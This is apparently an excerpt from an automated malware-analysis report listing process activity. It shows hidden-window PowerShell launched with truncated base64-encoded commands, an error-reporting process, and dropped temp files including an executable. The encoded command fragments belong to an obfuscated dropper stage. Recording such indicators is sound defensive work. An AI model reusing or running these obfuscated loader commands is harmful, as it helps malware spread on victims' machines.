Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGsANgBrAHUAMAB5AD0AKAAoACcAVgA2AGYAJwArACcANwBjACcAKQArACcAdAAwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdABlAG0AUABcAFcATwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\842093.cvr
- %TEMP%\word\2019\sbvzhvg.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGsANgBrAHUAMAB5AD0AKAAoACcAVgA2AGYAJwArACcANwBjACcAKQArACcAdAAwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdABlAG0AUABcAFcATwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (with a hidden window)